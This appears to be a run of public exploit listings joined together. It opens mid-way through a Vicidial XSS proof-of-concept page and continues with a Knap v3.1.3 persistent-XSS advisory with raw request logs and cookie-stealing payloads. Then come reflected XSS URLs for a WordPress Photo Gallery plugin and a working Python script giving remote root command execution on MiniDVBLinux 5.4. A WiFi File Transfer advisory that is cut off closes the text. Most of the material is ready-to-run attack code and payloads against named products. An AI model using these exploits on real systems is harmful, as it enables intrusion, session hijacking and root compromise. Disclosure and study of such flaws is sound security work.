src"https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=2022-01-15&agent=<iframe src=evil.source onload=alert(document.domain)></iframe>&SUBMIT=SUBMIT"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?query_date=2022-01-15&end_date=2022-01-15&shift=ALL&DB=&user=8178&group[]=0408&search_archived_data= &report_display_type=TEXT&stage=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?DB=&query_date=2022-01-15&end_date=2022-01-15&group%5B%5D=0408&report_display_type=TEXT&user=<iframe src=evil.source onload=alert(document.domain)></iframe>&shift=ALL&SUBMIT=SUBMIT"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&end_date=2022-01-15&group[]=--ALL--&shift=ALL"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&group[]=--ALL--&shift=ALL"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_days_detail.php?user=8178&query_date=2022-01-15&end_date=2022-01-15&group[]=--ALL--&shift=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/user_status.php?user=<iframe src=evil.source onload=alert(document.domain)></iframe>"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_agent_time_sheet.php?query_date=<iframe src=evil.source onload=alert(document.domain)></iframe>&agent=<iframe src=evil.source onload=alert(document.domain)></iframe>&SUBMIT=SUBMIT"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_user_group_hourly_detail.php?DB=&query_date=2022-01-04&start_hour=<iframe src=evil.source onload=alert(document.domain)></iframe> &end_hour=<iframe src=evil.source onload=alert(document.domain)></iframe>&file_download=1&SUBMIT=&search_archived_data="></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/admin.php?query_date=2021-12-06&end_date=<iframe src=evil.source onload=alert(document.domain)></iframe> &max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/admin.php?query_date<iframe src=evil.source onload=alert(document.domain)></iframe>&end_date=2022-01-04 &max_system_stats_submit=ADJUST+DATE+RANGE&ADD=999992&stage=TOTAL"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=<iframe src=evil.source onload=alert(document.domain)></iframe> &type=inbound&query_date=+00%3A00%3A00&end_date+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift=ALL &report_display_type=HTML"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00 &end_date<iframe src=evil.source onload=alert(document.domain)></iframe>+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00 &end_date_D=&end_date_T=23%3A59%3A59&shift=ALL&report_display_type=HTML "></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59 &query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59&shift<iframe src=evil.source onload=alert(document.domain)></iframe> &report_display_type=HTML"></iframe> <iframe src"https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB= &type=<iframe src=evil.source onload=alert(document.domain)></iframe>&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59 &shift=ALL&report_display_type=HTML"></iframe> </body></head> </html> Security Risk: ============== The security risk of the cross site scripting web vulnerabilities in the vicidial web-application are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>Document Title: =============== Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2307 Release Date: ============= 2022-10-10 Vulnerability Laboratory ID (VL-ID): ==================================== 2307 Common Vulnerability Scoring System: ==================================== 5.7 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Knap is an advanced User Management software written in Laravel 5.4 (PHP Framework) that allows the admin to manage users. Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the Knap Advanced PHP Login v3.1.3 user management web-application. Affected Product(s): ==================== ajay138 Product: Knap Advanced PHP Login v3.1.3 - User Management (Web-Application) Vulnerability Disclosure Timeline: ================================== 2021-09-03: Researcher Notification & Coordination (Security Researcher) 2021-09-04: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2022-10-10: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discoveredin the Knap Advanced PHP Login v3.1.3 user management web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site web vulnerability is located in the name parameter of the Profile Account - Account Information module. Remote attackers with ow privileged user accounts are able to inject own malicious script code as name to provoke an execution of the malicious content inside the users and activity log backend modules. The request method to inject is post. The injection points are the user create or update and the execution of the maliciou script code occurs in the activity log and users listings. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Register (Site) [+] Update (Account Information) Vulnerable Input(s): [+] Name Vulnerable Parameter(s): [+] name Affected Module(s): [+] ./users [+] ./activity Proof of Concept (PoC): ======================= The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Register as user or get registered by the admin 2. Start your web browser and a session tamper or debug tools 3. Open the My Profile menu with the Profile Account information section 4. Change the name input to your script code test payload and save via submit (post) Note: The injected payload executes successfully in the users list (backend) and within the activity log on history (backend) on preview by admins or mods 5. Successful reproduce of the persistent cross site scripting web vulnerability! --- PoC Session Logs (POST [Inject via User Role by Profile Account Update|Create] --- https://knap.froid.works/profiles/102 Host: knap.froid.works Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------73425417436906186553080920069 Content-Length: 29455 Origin:https://knap.froid.works Connection: keep-alive Referer:https://knap.froid.works/profile-edit Cookie: laravel_session=eyJpdiI6Ikt4Zmd3WDVSeThObVlvbnZld1JadWc9PSIsInZhbHVlIjoiN3pubk1YaVwvaWp6aWF2QlNwb3l2T2 h5MzdHZjJUd0Y2em1mUXE4Q1wvZHhnbkhwUW1ZaDU3aytaWFNURk5pc1M4IiwibWFjIjoiM2UwMTg0MGQ0M2VjMDk0YTVkN2M0ZGVjOWM5NmI1NDMzYzUxODU5ZmVkNmNmZDJlMTc5ZmVlYThiNTlkODIxZCJ9 0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B &28=e&29=8&30=T&31=X&32=0&33=F&34=q&35=v&36=N&37=L&38=b&39=J&40=I&41=j&42=M&43=k&44=1&45=B&46=z&47=&&48=_&49=m&50=e&51=t&52=h &53=o&54=d&55==&56=P&57=U&58=T&59=&&60=n&61=a&62=m&63=e&64==&65=P&66=i&67=p&68=p&69=o&70=%&71=2&72=2&73=%&74=3&75=E&76=%&77=3 &78=C&79=i&80=m&81=g&82=%&83=3&84=E&85=%&86=3&87=E&88=%&89=2&90=2&91=%&92=3&93=C&94=i&95=f&96=r&97=a&98=m&99=e&100=+&101=s &102=r&103=c&104=%&105=3&106=D&107=e&108=v&109=i&110=l&111=.&112=s&113=o&114=u&115=r&116=c&117=e&118=+&119=o&120=n&121=l&122=o &123=a&124=d&125=%&126=3&127=D&128=a&129=l&130=e&131=r&132=t&133=(&134='&135=P&136=W&137=N&138=D&139='&140=)&141=%&142=3 &143=E&144=%&145=3&146=C&147=%&148=2&149=F&150=i&151=f&152=r&153=a&154=m&155=e&156=%&157=3&158=E&159=&&160=t&161=y&162=p&163=e&164==&165=p&166=e&167=r&168=s&169=o&170=n&171=a&172=l&173=I&174=n&175=f&176=o &177=&&178=e&179=m&180=a&181=i&182=l&183==&184=f&185=t&186=p&187=%&188=4&189=0&190=l&191=i&192=v&193=e&194=.&195=c&196=o &197=m&198=&&199=d&200=o&201=b&202==&203=2&204=0&205=2&206=1&207=-&208=0&209=9&210=-&211=1&212=0&213=&&214=g&215=e&216=n&217=d&218=e&219=r&220==&221=m&222=a&223=l&224=e&225=&&226=c&227=u&228=s&229=t&230=o &231=m&232=_&233=f&234=i&235=e&236=l&237=d&238=s&239=_&240=d&241=a&242=t&243=a&244=%&245=5&246=B&247=u&248=r&249=b&250=_ &251=1&252=%&253=5&254=D&255==&256=t&257=e&258=s &259=t&260=e&_token=SB0qT5bOBkRwdnUJMAzgBe8TX0FqvNLbJIjMk1Bz&_method=PUT&name=Pippo"><img>>"<iframe src=evil.source onload=alert('PWND')></iframe>&type=personalInfo &email=ftp@live.com&dob=2021-09-10&gender=male&custom_fields_data[urb_1]=teste - POST: HTTP/1.1 200 OK Server: Apache/2.4.39 (Ubuntu) Set-Cookie: laravel_session=eyJpdiI6Ik1zbUliRHJrMjNqY2pPcDQ5aENtYVE9PSIsInZhbHVlIjoiRjVYTG9aNjJUTlwvbHJDZ2xQbUx6V1hTOFg2SnlWeTBDYW1HVHNVOEJ4bUR KZ3ExMFVRcEE0bEI5OURMUm55RVciLCJtYWMiOiIzMzg2OTAyZTcyMDJmOGQ0ZWY5MWNjY2ZkZmRkOTA3NzA2NjI1NzViOWM5OWVlMzE0ZTZjMzhjMjRjMjE0N2VhIn0%3D; expires=Fri, 10-Sep-2021 19:09:50 GMT; Max-Age=7200; path=/; httponly Content-Length: 53 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json --- PoC Session Logs (POST [Inject via Admin Role] --- https://knap.froid.works/users/102 Host: knap.froid.works Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------23081715668612801831491484963 Content-Length: 39263 Origin:https://knap.froid.works Connection: keep-alive Referer:https://knap.froid.works/users Cookie: laravel_session=eyJpdiI6IktJUUlXU21TZHZGRHdkNEczbGZwMXc9PSIsInZhbHVlIjoidlhcLzl3cU1UbHVwZFVDclhkXC9CZGdDNkh XTEtlTnNmNWlWY3hwRzd3ZFNUcVI3R1plVHc1NE5tRUJoVmxobElQIiwibWFjIjoiODYyMmNiMjFlYTJjYzdkNGZkOTI2ZWQzYjg2M2U5OTA5NWI5NzVhYzExOWYzYTcwMTkyOTk1ZDMxOGRhNWE3OSJ9 0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B&28=e&29=8&30=T&31=X&32=0&33= F&34=q&35=v&36=N&37=L&38=b&39=J&40=I&41=j&42=M&43=k&44=1&45=B&46=z&47=&&48=_&49=m&50=e&51=t&52=h&53=o&54=d&55==&56=P&57=U&58=T&59=&&60=n&61=a&62=m&63= e&64==&65=P&66=i&67=p&68=p&69=o&70=%&71=2&72=2&73=%&74=3&75=E&76=%&77=3&78=C&79=i&80=f&81=r&82=a&83=m&84=e&85=%&86=3&87=E&88=%&89=3&90=E&91=%&92=2&93= 2&94=%&95=3&96=C&97=i&98=f&99=r&100=a&101=m&102=e&103=+&104=s&105=r&106=c&107=%&108=3&109=D&110=e&111=v&112=i&113=l&114=.&115=s&116=o&117=u&118=r&119= c&120=e&121=+&122=o&123=n&124=l&125=o&126=a&127=d&128=%&129=3&130=D&131=a&132=l&133=e&134=r&135=t&136=(&137=d&138=o&139=c&140=u&141=m&142=e&143=n&144= t&145=.&146=c&147=o&148=o&149=k&150=i&151=e&152=)&153=%&154=3&155=E&156=%&157=3&158=C&159=%&160=2&161=F&162=i&163=f&164=r&165=a&166=m&167=e&168=%&169=3&170=E&171=&&172=e&173=m&174=a&175=i&176=l&177==&178=f&179=e&180=l&181=i&182=x&183=d&184=i&185=r&186=%&187=4&188=0&189=l&190=i&191=v&192= e&193=.&194=c&195=o&196=m&197=&&198=d&199=o&200=b&201==&202=2&203=0&204=2&205=1&206=-&207=0&208=9&209=-&210=1&211=0&212=&&213=g&214=e&215=n&216=d&217=e&218=r&219==&220=m&221=a&222=l&223=e&224=&&225=p&226=a&227=s&228=s&229=w&230=o&231=r&232= d&233==&234=&&235=x&236=C&237=o&238=o&239=r&240=d&241=O&242=n&243=e&244==&245=&&246=y&247=C&248=o&249=o&250=r&251=d&252=O&253=n&254= e&255==&256=&&257=p&258=r&259=o&260=f&261=i&262=l&263=e&264=I&265=m&266=a&267=g&268=e&269=W&270=i&271=d&272=t&273=h&274==&275=&&276= p&277=r&278=o&279=f&280=i&281=l&282=e&283=I&284=m&285=a&286=g&287=e&288=H&289=e&290=i&291=g&292=h&293=t&294==&295=&&296=c&297=u&298= s&299=t&300=o&301=m&302=_&303=f&304=i&305=e&306=l&307=d&308=s&309=_&310=d&311=a&312=t&313=a&314=%&315=5&316=B&317=u&318=r&319=b&320=_&321=1&322=%&323=5&324=D&325==&326=a&327=s&328=d&329=a&330=&&331=s&332=t&333=a&334=t&335=u&336=s&337==&338=a&339=c&340=t&341= i&342=v&343=e&_token=SB0qT5bOBkRwdnUJMAzgBe8TX0FqvNLbJIjMk1Bz&_method=PUT&name=Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&email=felixdir@live.com&dob=2021-09-10&gender=male&password=&image=&xCoordOne=&yCoordOne=&profileImageWidth=&profileImageHeight=&custom_fields_data[urb_1]=asda&status=active - POST: HTTP/1.1 200 OK Server: Apache/2.4.39 (Ubuntu) Set-Cookie: laravel_session=eyJpdiI6IjdiMGZ5MHYzYklHbXpMS3FXK3ExTWc9PSIsInZhbHVlIjoid04yKzJWXC9wMzNEdVdheWJUVHNNS0c5VHQ3R2Y2OGpqY0U1a2VcLzRoM1 hIbzNrZDZCZk45SnhwRW5jTXhNMzNWIiwibWFjIjoiNDJmNGE3ZDgzMDU5Mzk5MjA0MzQwZWJhOGRkZTg0N2FmZWI0NGM4ZjNkZjg3M2Y1ZWNjNjQ2OTM1YTk3Y2UyOSJ9; expires=Fri, 10-Sep-2021 18:52:58 GMT; Max-Age=7200; path=/; httponly Content-Length: 53 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json Vulnerable Source: ./users (knap.deleteAlert) <table class="table table-striped table-bordered table-hover table-checkable order-column dataTable no-footer" id="users" role="grid" aria-describedby="users_info" style="width: 1568px;"> <thead> <tr role="row"><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 57px;" aria-label="ID: activate to sort column ascending">ID</th> <th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 67px;" aria-label="Avatar: activate to sort column ascending">Avatar</th> <th class="sorting_asc" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 120px;" aria-label="Name: activate to sort column descending" aria-sort="ascending">Name</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 257px;" aria-label="Email: activate to sort column ascending">Email</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 73px;" aria-label="Gender: activate to sort column ascending">Gender</th><th class="sorting_disabled" rowspan="1" colspan="1" style="width: 258px;" aria-label="Roles">Roles</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 64px;" aria-label="Status: activate to sort column ascending">Status</th><th class="sorting_disabled" rowspan="1" colspan="1" style="width: 323px;" aria-label="Actions">Actions</th></tr> </thead> <tbody> <tr role="row" class="odd"><td>19</td><td><img src="https://www.gravatar.com/avatar/18228d88bbd04db784b489f7ad9402e0?d=mm&s=250" height="100px"></td> <td class="sorting_1">Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></td><td>test@test.de</td> <td> male</td><td><ul><li>Role Dashboard</li></ul></td><td>Active</td> - <a style="margin: 1px;" href="javascript:;" onclick="knap.deleteAlert('users','Are you sure you want to delete Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>? This action cannot be undone.',19)" class="btn btn-sm btn-danger red"> Delete</a> Vulnerable Source: ./activity <div class="portlet light bordered"> <div class="portlet-title"> <div class="caption font-dark"> Activity Log </div> <div class="actions"> </div></div> <div class="portlet-body"> <div class="table-toolbar"> <div class="row"> <div class="col-md-6"> </div></div></div> <div id="activity_wrapper" class="dataTables_wrapper no-footer"><div class="row"><div class="col-md-6 col-sm-6"><div class="dataTables_length" id="activity_length"> <label>Show <select name="activity_length" aria-controls="activity" class="form-control input-sm input-xsmall input-inline"><option value="10">10</option> <option value="15">15</option><option value="20">20</option><option value="-1">All</option></select> records</label></div></div><div class="col-md-6 col-sm-6"> <div id="activity_filter" class="dataTables_filter"><label>Search:<input type="search" class="form-control input-sm input-small input-inline" placeholder="" aria-controls="activity"></label></div></div><div id="activity_processing" class="dataTables_processing" style="display: none;">Processing...</div></div> <div class="table-scrollable"><table class="table table-striped table-bordered table-hover order-column dataTable no-footer" id="activity" role="grid" aria-describedby="activity_info" style="width: 1566px;"> <thead> <tr role="row"><th class="sorting" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 61px;" aria-label="ID: activate to sort column ascending">ID</th><th class="sorting" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 1093px;" aria-label="Message: activate to sort column ascending">Message</th><th class="sorting_desc" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 266px;" aria-sort="descending" aria-label="Log Time: activate to sort column ascending">Log Time</th></tr> </thead> <tbody> <tr role="row" class="odd"><td>114</td><td>Admin updated role role-activity-log successfully</td><td class="sorting_1">Fri, Sep 10, 2021 5:03 PM</td></tr> <tr role="row" class="even"><td>113</td><td>Admin updated role role-activity-log"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 5:02 PM</td></tr><tr role="row" class="odd"><td>112</td><td>Admin updated user Abdul Zboncak successfully</td> <td class="sorting_1">Fri, Sep 10, 2021 5:02 PM</td></tr><tr role="row" class="even"><td>111</td><td>Admin updated user Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr> <tr role="row" class="odd"><td>110</td><td>Admin deleted user a successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><tr role="row" class="even"> <td>109</td><td>Admin updated user a successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><tr role="row" class="odd"><td>108</td> <td>Admin created user a"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:56 PM</td> </tr><tr role="row" class="even"><td>107</td><td>Admin updated user Pippo successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:56 PM</td></tr> <tr role="row" class="odd"><td>106</td><td>Admin updated user Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:52 PM</td></tr><tr role="row" class="even"><td>105</td> <td>Admin updated user Pippo>"<iframe src="evil.source" onload="alert(document.cookie)"></iframe> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:52 PM</td></tr></tbody> </table></div><div class="row"><div class="col-md-5 col-sm-5"><div class="dataTables_info" id="activity_info" role="status" aria-live="polite">Showing 1 to 10 of 100 records</div></div><div class="col-md-7 col-sm-7"><div class="dataTables_paginate paging_bootstrap_full_number" id="activity_paginate"><ul class="pagination" style="visibility: visible;"><li class="prev disabled"><a href="#" title="First"></a> </li><li class="prev disabled"><a href="#" title="Prev"></a></li><li class="active"><a href="#">1</a></li><li><a href="#">2</a></li> <li><a href="#">3</a></li><li><a href="#">4</a></li><li><a href="#">5</a></li><li class="next"><a href="#" title="Next"></a></li> <li class="next"><a href="#" title="Last"></a></li></ul></div></div></div></div> </div> </div> Solution - Fix & Patch: ======================= The persistent xss web vulnerability can be resolved by the following steps ... 1. Restrict the input fields of the name parameter to disallow special chars for the registration and update account information 2. Encode and escape the content of the name parameter to sanitize the registration and update account information 3. Sanitize and filter the output locations of the users and the activity log list modules Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY (VULNERABILITY LAB) RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : wordpress.org/plugins/ │ │ Vendor : Photo Gallery Team - wpsofts.com │ │ Software : WordPress Photo Gallery 1.8.0 │ │ Vuln Type: Reflected XSS │ │ Method : GET │ │ Impact : Manipulate the content of the site │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ The attacker can send to victim a link containing a malicious URL in an email or │ │ instant message can perform a wide variety of actions, such as stealing the victim's │ │ session token or login credentials │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ URL parameter 'pg' is vulnerable to XSS Path: /photo-gallery/ https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1 URL parameter 'pid' is vulnerable to XSS Path: /photo-gallery/ https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2 [-] Done </code></pre>

<pre><code>#!/usr/bin/env python3 # # # MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability # # # Vendor: MiniDVBLinux # Product web page: https://www.minidvblinux.de # Affected version: <=5.4 # # Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple # way to convert a standard PC into a Multi Media Centre based on the # Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this # Linux based Digital Video Recorder: Watch TV, Timer controlled # recordings, Time Shift, DVD and MP3 Replay, Setup and configuration # via browser, and a lot more. MLD strives to be as small as possible, # modular, simple. It supports numerous hardware platforms, like classic # desktops in 32/64bit and also various low power ARM systems. # # Desc: The application suffers from an OS command execution vulnerability. # This can be exploited to execute arbitrary commands as root, through the # 'command' GET parameter in /tpl/commands.sh. # # Tested on: MiniDVBLinux 5.4 # BusyBox v1.25.1 # Architecture: armhf, armhf-rpi2 # GNU/Linux 4.19.127.203 (armv7l) # VideoDiskRecorder 2.4.6 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2022-5718 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php # # # 24.09.2022 # import requests import re,sys #test case 002 #http://ip:8008/?site=commands&section=system&command=sleep%201;reboot #- #test case 003 #http://ip:8008/?site=commands&section=system&command=id #uid=0(root) gid=0(root) if len(sys.argv) < 3: print('MiniDVBLinux 5.4 Command Execution PoC') print('Usage: ./mldhd_root1.py [url] [cmd]') sys.exit(17) else: url = sys.argv[1] cmd = sys.argv[2] req = requests.get(url+'/?site=commands&section=system&command='+cmd) req = requests.get(url+'/?site=commands&section=system&command='+cmd) outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group() print(outz.replace('log\'>','').replace('</pre>','')) </code></pre>

<pre><code>Document Title: =============== WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2322 Release Date: ============= 2022-10-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2322 Common Vulnerability Scoring System: ==================================== 5.6 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application. Affected Product(s): ==================== smarterDroid Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-10-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function. Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent attack vector via post method request. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Proof of Concept (PoC): ======================= The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction. For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue. Manual reproduce of the vulnerability ... 1. Install the mobile android application and start it 2. Start the wifi web-server 3. Login as attacker by the browser over the network 4. Inject payload as 